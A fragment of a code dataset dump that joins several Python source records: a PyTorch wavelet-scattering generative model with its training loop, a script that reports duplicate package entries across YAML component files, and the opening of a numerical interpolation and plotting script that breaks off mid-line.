\n def forward(self, x_real): \n # x_real: batch_size * 1 * n\n self.x_real = x_real.unsqueeze(3)\n self.x = torch.cat((self.x_real, self.x_imag), 3) # batch_size * 1 * n * 2\n \n # convolution in frequency\n x_hat = torch.fft(self.x, 1) # fft\n # multiply in freq batch_size * nwave * n\n y_real_hat = x_hat[:,:,:,0] * self.g_real_hat - x_hat[:,:,:,1] * self.g_imag_hat \n y_imag_hat = x_hat[:,:,:,0] * self.g_imag_hat + x_hat[:,:,:,1] * self.g_real_hat\n # ifft, batch_size * nwave * n * 2\n y = torch.ifft(torch.cat((y_real_hat.unsqueeze(3), y_imag_hat.unsqueeze(3)), 3), 1) \n \n # nonlinear operator: modulus, batch_size * nwave * n\n temp = torch.sqrt(y[:,:,:,0]**2 + y[:,:,:,1]**2) \n \n # 1st order scattering\n s = torch.mean(temp**self.p1, 2)\n \n # 2nd order scattering\n if self.layer2:\n temp = temp.unsqueeze(3)\n temp2 = torch.zeros(self.batch_size, nwave, n)\n if torch.cuda.is_available():\n temp2 = temp2.cuda()\n x2 = torch.cat((temp**self.p1, self.x2_imag), 3) # batch_size * nwave * n * 2\n x2_hat = torch.fft(x2, 1)\n for i in range(self.nwave):\n # batch_size * n\n y2_real_hat = x2_hat[:,i,:,0] * self.g2_real_hat[:,i,:] - x2_hat[:,i,:,1] * self.g2_imag_hat[:,i,:] \n y2_imag_hat = x2_hat[:,i,:,0] * self.g2_imag_hat[:,i,:] + x2_hat[:,i,:,1] * self.g2_real_hat[:,i,:]\n # batch_size * n * 2\n y2 = torch.ifft(torch.cat((y2_real_hat.unsqueeze(2), y2_imag_hat.unsqueeze(2)), 2), 1) \n \n # nonlinear operator: modulus, batch_size * nwave * n\n temp2[:, i, :] = torch.sqrt(y2[:,:,0]**2 + y2[:,:,1]**2) \n s = torch.cat((s, torch.mean(temp2**self.p2, 2)), 1)\n \n # normalize signal to height {1, -1}\n if self.norm:\n self.z_imag = torch.zeros(self.batch_size, 1, n, 1) # imagery part of x is zero\n self.z2_imag = torch.zeros(self.batch_size, self.nwave, n, 1) \n if torch.cuda.is_available():\n self.z_imag = self.z_imag.cuda()\n self.z2_imag = self.z2_imag.cuda()\n \n self.z_real = (torch.abs(self.x_real) > self.eps).float() * torch.sign(self.x_real)\n self.z = torch.cat((self.z_real, self.z_imag), 3) # batch_size * 1 * n * 2\n \n # convolution in frequency\n z_hat = torch.fft(self.z, 1) # fft\n # multiply in freq batch_size * nwave * n\n w_real_hat = z_hat[:,:,:,0] * self.g_real_hat - z_hat[:,:,:,1] * self.g_imag_hat \n w_imag_hat = z_hat[:,:,:,0] * self.g_imag_hat + z_hat[:,:,:,1] * self.g_real_hat\n # ifft, n_batch * nwave * n * 2\n w = torch.ifft(torch.cat((w_real_hat.unsqueeze(3), w_imag_hat.unsqueeze(3)), 3), 1) \n \n # nonlinear operator: modulus, batch_size * nwave * n\n temp = torch.sqrt(w[:,:,:,0]**2 + w[:,:,:,1]**2) \n\n # 1st order scattering\n s = torch.cat((s, torch.mean(temp**self.p, 2)), 1)\n\n # 2nd order scattering\n if self.layer2:\n temp = temp.unsqueeze(3)\n temp2 = torch.zeros(self.batch_size, nwave, n)\n z2 = torch.cat((temp**self.p1, self.z2_imag), 3) # batch_size * nwave * n * 2\n z2_hat = torch.fft(z2, 1)\n for i in range(self.nwave):\n # batch_size * n\n w2_real_hat = z2_hat[:,i,:,0] * self.g2_real_hat[:,i,:] - z2_hat[:,i,:,1] * self.g2_imag_hat[:,i,:] \n w2_imag_hat = z2_hat[:,i,:,0] * self.g2_imag_hat[:,i,:] + z2_hat[:,i,:,1] * self.g2_real_hat[:,i,:]\n \n # batch_size * n * 2\n w2 = torch.ifft(torch.cat((w2_real_hat.unsqueeze(2), w2_imag_hat.unsqueeze(2)), 2), 1) \n # nonlinear operator: modulus, batch_size * nwave * n\n temp2[:, i, :] = torch.sqrt(w2[:,:,0]**2 + w2[:,:,1]**2) \n s = torch.cat((s, torch.mean(temp2**self.p2, 2)), 1)\n return s.unsqueeze(1) # batch_size * 1 * nf\n \n \n\nclass Generator(torch.nn.Module):\n \n def __init__(self, output_scale, out_active = 'tanh'):\n super(Generator, self).__init__()\n self.output_scale = output_scale\n\n self.l1 = nn.Sequential(\n nn.Linear(100, 1024),\n nn.Tanh()\n )\n self.l2 = nn.Sequential(\n nn.Linear(1024, 256*256),\n nn.Tanh()\n )\n \n self.conv1 = nn.Sequential(\n nn.ConvTranspose1d(\n in_channels=256, out_channels=128, kernel_size=8,\n stride=4, padding=2, bias=False\n ),\n nn.BatchNorm1d(128),\n nn.Tanh()\n )\n self.conv2 = nn.Sequential(\n nn.ConvTranspose1d(\n in_channels=128, out_channels=1, kernel_size=8,\n stride=4, padding=2, bias=False\n )\n )\n if out_active == 'tanh':\n self.out = torch.nn.Tanh()\n elif out_active == 'sigmoid':\n self.out = torch.nn.Sigmoid()\n\n def forward(self, x):\n # Project and reshape\n x = self.l1(x)\n x = self.l2(x)\n x = x.view(x.shape[0], 256, 16*16)\n # Convolutional layers\n x = self.conv1(x)\n x = self.conv2(x)\n # Apply Tanh\n return self.output_scale * self.out(x)\n \n\n\n# Noise\ndef noise(size):\n n = Variable(torch.randn(size, 100))\n if torch.cuda.is_available(): return n.cuda()\n return n\n\ndef init_weights(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1 or classname.find('BatchNorm') != -1:\n m.weight.data.normal_(0.00, 0.02)\n\ndef plot_signals(ntest, epoch, signals):\n n = 16\n fig = plt.figure(figsize = (10,10))\n for i in range(n):\n plt.subplot(4,4,i+1)\n plt.plot(signals[i,:])\n frame1 = plt.gca()\n frame1.axes.get_xaxis().set_visible(False)\n frame1.axes.get_yaxis().set_visible(False)\n np.save('./result/scat_gen_signal%s_%s.npy'%(ntest, epoch), signals)\n plt.savefig('./result/scat_gen_signal%s_%s'%(ntest, epoch))\n\ndef gabor_wave_1d(n, s, xi):\n # generate one 1D gabor wavelet \n x = np.arange(n)\n chi = np.zeros(n)\n chi[0:s] = 1/s\n# chi[0:s] = 1\n \n o = np.exp(1j * xi * x)\n \n psi = np.multiply(chi, o)\n \n psi_hat = np.fft.fft(psi)\n return psi, psi_hat\n \n\ndef gabor_wave_family_1d(n, s, xi):\n # generate a family of 1D gabor wavelets with specified scales and rotations in space\n ns = s.shape[0]\n nxi = xi.shape[0]\n \n psi = np.zeros((n, ns, nxi),dtype=complex)\n psi_hat = np.zeros((n, ns, nxi),dtype=complex)\n for i in range(ns):\n for k in range(nxi):\n psi[:, i, k], psi_hat[:, i, k] = gabor_wave_1d(n, int(s[i]), xi[k])\n return psi, psi_hat\n\ndef bump_wave_1d(n, s, xi):\n # generate one 1D gabor wavelet \n x = np.arange(n)\n chi = np.zeros(n)\n t = np.arange(s - 1) + 1\n chi[1:s] = np.exp( - s**2 / (4 * t * s - 4 * t**2))\n# chi[0:s] = 1\n \n o = np.exp(1j * xi * x)\n \n psi = np.multiply(chi, o)\n \n psi_hat = np.fft.fft(psi)\n return psi, psi_hat\n\ndef bump_wave_family_1d(n, s, xi):\n # generate a family of 1D gabor wavelets with specified scales and rotations in space\n ns = s.shape[0]\n nxi = xi.shape[0]\n \n psi = np.zeros((n, ns, nxi),dtype=complex)\n psi_hat = np.zeros((n, ns, nxi),dtype=complex)\n for i in range(ns):\n for k in range(nxi):\n psi[:, i, k], psi_hat[:, i, k] = bump_wave_1d(n, int(s[i]), xi[k])\n return psi, psi_hat\n\ndef estimate_lambda(x, epsilon = 0.8):\n lambda_hat = np.zeros(x.shape[0]) \n for i in range(x.shape[0]):\n ind = np.append([0], np.where(x[i,:] > epsilon))\n if ind.shape[0] > 1:\n ind_delta = np.diff(ind).squeeze()\n lambda_hat[i] = 1/np.mean(ind_delta)\n return np.mean(lambda_hat)\n\n# define wavelets\n\n# epsilon = 1e-4\n# sigma = determine_sigma(epsilon)\n# Q = 2\n# alpha = 2\n# J = determine_J(n, Q, sigma, alpha)\n# J = 4\ns = np.unique(np.floor(2 ** np.linspace(1, J, int(J*Q)+1-Q)))\n#s = np.array([1,2,4,8,10,16,31,63,129,257,513])\n# xi = 2 * pi * np.random.choice(n,1) / n\n# xi2 = 2 * pi * np.random.choice(n,1) / n\n# np.save('./result/xi_%s.npy'%ntest, xi)\n# np.save('./result/xi2_%s.npy'%ntest, xi2)\n\ng, g_hat = gabor_wave_family_1d(n,s,xi)\ng = np.reshape(g, (g.shape[0], -1)) # n * nwave\nnwave = g.shape[1]\ng_hat = np.swapaxes(np.reshape(g_hat, (g_hat.shape[0], -1)), 0, 1) # nwave * n\ng_real_hat = torch.from_numpy(np.real(g_hat)).float()\ng_imag_hat = torch.from_numpy(np.imag(g_hat)).float()\n\ns2 = s * c\ng2, g2_hat = gabor_wave_family_1d(n,s2,xi2)\ng2 = np.reshape(g2, (g2.shape[0], -1)) # n * nwave\ng2_hat = np.swapaxes(np.reshape(g2_hat, (g2_hat.shape[0], -1)), 0, 1) # nwave * n\ng2_real_hat = torch.from_numpy(np.real(g2_hat)).float()\ng2_imag_hat = torch.from_numpy(np.imag(g2_hat)).float()\n\nif torch.cuda.is_available():\n g_real_hat = g_real_hat.cuda()\n g_imag_hat = g_imag_hat.cuda()\n g2_real_hat = g2_real_hat.cuda()\n g2_imag_hat = g2_imag_hat.cuda()\nprint('wavelets defined')\n\n\n\ntest_noise = noise(num_test_samples)\n# logger = Logger(model_name='DCGAN', data_name='MNIST')\ng_error_sum = []\n\n\n# Create Network instances and init weights\ngenerator = Generator(output_scale)\ngenerator.apply(init_weights)\n# generator.load_state_dict(torch.load('./result/scat_GAN_GEN_test%s'%(ntest - 1), map_location=lambda storage, loc: storage))\n\nnf = nwave\nif l2:\n nf = 2 * nf\nif layer2:\n nf = 2 * nf\nif norm:\n nf = 2 * nf\nprint('nf: ',nf) \n\nscatter = scattering(g_real_hat, g_imag_hat, g2_real_hat, g2_imag_hat, l2, layer2, norm, batch_size, n, p1, p2)\nscatter.apply(init_weights)\n\n# Enable cuda if available\nif torch.cuda.is_available():\n generator.cuda()\n scatter.cuda()\n \n# Optimizers\ng_optimizer = Adam(generator.parameters(), lr=0.000005, betas=(0.5, 0.999))\n\n# Loss function\nloss = nn.MSELoss()\n\nprint('Model initialized!')\n\nfor epoch in range(num_epochs):\n print('epoch:',epoch)\n for idx in range(nbatch):\n real_batch = x_data[idx * batch_size:(idx + 1)*batch_size, :]\n # 1. Train Discriminator\n real_data = Variable(real_batch)\n if torch.cuda.is_available(): real_data = real_data.cuda()\n s_real = scatter(real_data)\n \n # Train Generator\n # Generate fake data\n fake_data = generator(noise(real_batch.size(0)))\n # Train G\n # g_error = train_generator(g_optimizer, fake_data)\n g_optimizer.zero_grad()\n # Sample noise and generate fake data\n s_fake = scatter(fake_data)\n # Calculate error and backpropagate\n #print('prediction fake: ', prediction[0])\n g_error = loss(s_fake, s_real)\n g_error.backward()\n # Update weights with gradients\n g_optimizer.step()\n # Return error\n \n #print(torch.mean(d_error).data.cpu())\n g_error_sum.append(float(torch.mean(g_error).data.cpu()))\n \n test_signals = generator(test_noise).squeeze(1).data.cpu().numpy()\n plot_signals(ntest, epoch, test_signals)\n lamb_est = estimate_lambda(test_signals)\n print('estimated lambda: ', lamb_est)\n np.save('./result/scat_gen_loss%s.npy'%ntest, np.asarray(g_error_sum))\n torch.save(generator.state_dict(), './result/scat_gen_G%s'%ntest)\n","sub_path":"GAN/pytorch/scat_gen/scat_gen.py","file_name":"scat_gen.py","file_ext":"py","file_size_in_byte":16445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"179688828","text":"import os\nimport sys\nimport yaml\n\nimport paste.util.multidict\n\npossible_topdir = os.path.normpath(os.path.join(os.path.abspath(sys.argv[0]),\n os.pardir,\n os.pardir))\nif os.path.exists(os.path.join(possible_topdir,\n 'anvil',\n '__init__.py')):\n sys.path.insert(0, possible_topdir)\n\nfrom anvil import log\nfrom anvil import utils\n\n\nclass CustomDumper(yaml.SafeDumper):\n def ignore_aliases(self, _data):\n return True\n\n\nfn = sys.argv[1]\nwith open(fn, \"r\") as fh:\n data = fh.read()\n\nb = yaml.load(data)\n\nnames = set()\nfor c in b['components']:\n names.add(c)\n\n\nidf = 'packages'\npkgs = paste.util.multidict.MultiDict()\nfor name in names:\n data = b['components'][name]\n #print name\n for p in data.get(idf) or []:\n pname = p['name']\n pkgs.add(pname, p)\n\ncommon = list()\nfor pkg in sorted(list(set(pkgs.keys()))):\n items = pkgs.getall(pkg)\n if len(items) > 1:\n print(\"Package dupe on: %r with %s dups\" % (pkg, len(items)))\n versions = set()\n for v in items:\n if v.get('version'):\n versions.add(str(v.get('version')))\n if len(versions) > 1:\n print(\"\\tWith many versions: %s\" % (versions))\n else:\n print(\"\\tAll with the same version %s\" % (versions))\n common.append(items[0])\n\nidf = 'pips'\npkgs = paste.util.multidict.MultiDict()\nfor name in names:\n data = b['components'][name]\n for p in data.get(idf) or []:\n pname = p['name']\n pkgs.add(pname, p)\n\nprint(\"-\" * 20)\ncommon_pips = list()\nfor pkg in sorted(list(set(pkgs.keys()))):\n items = pkgs.getall(pkg)\n if len(items) > 1:\n print(\"Pip dupe on: %r with %s dups\" % (pkg, len(items)))\n versions = set()\n for v in items:\n if v.get('version'):\n versions.add(str(v.get('version')))\n if len(versions) > 1:\n print(\"\\tWith many versions: %s\" % (versions))\n else:\n print(\"\\tAll with the same version %s\" % (versions))\n common_pips.append(items[0])\n\n#data = {'common': {'packages': common, 'pips': common_pips}}\n#formatted = yaml.dump(data,\n# line_break=\"\\n\",\n# indent=4,\n# explicit_start=True,\n# explicit_end=True,\n# default_flow_style=False,\n# Dumper=CustomDumper,\n# )\n\n#print formatted\n","sub_path":"tools/shared-packs.py","file_name":"shared-packs.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"361439405","text":"import math\r\nimport numpy\r\nimport matplotlib.pyplot as plt\r\n\r\ndef plotByPointInterP(given,xAnalise): #plota via trechos para gerar curva suavizada\r\n givenX=[]\r\n givenY=[]\r\n for i in range (len(given)):\r\n givenX.append(given[i][0])\r\n givenY.append(given[i][1])\r\n x=[]\r\n y=[]\r\n ypoint=0.\r\n xpoint=0.\r\n xminimo=givenX[0]-1\r\n xmaximo=givenX[len(givenX)-1]+1\r\n if(xminimo>xAnalise):\r\n xminimo=xAnalise\r\n elif(xmaximo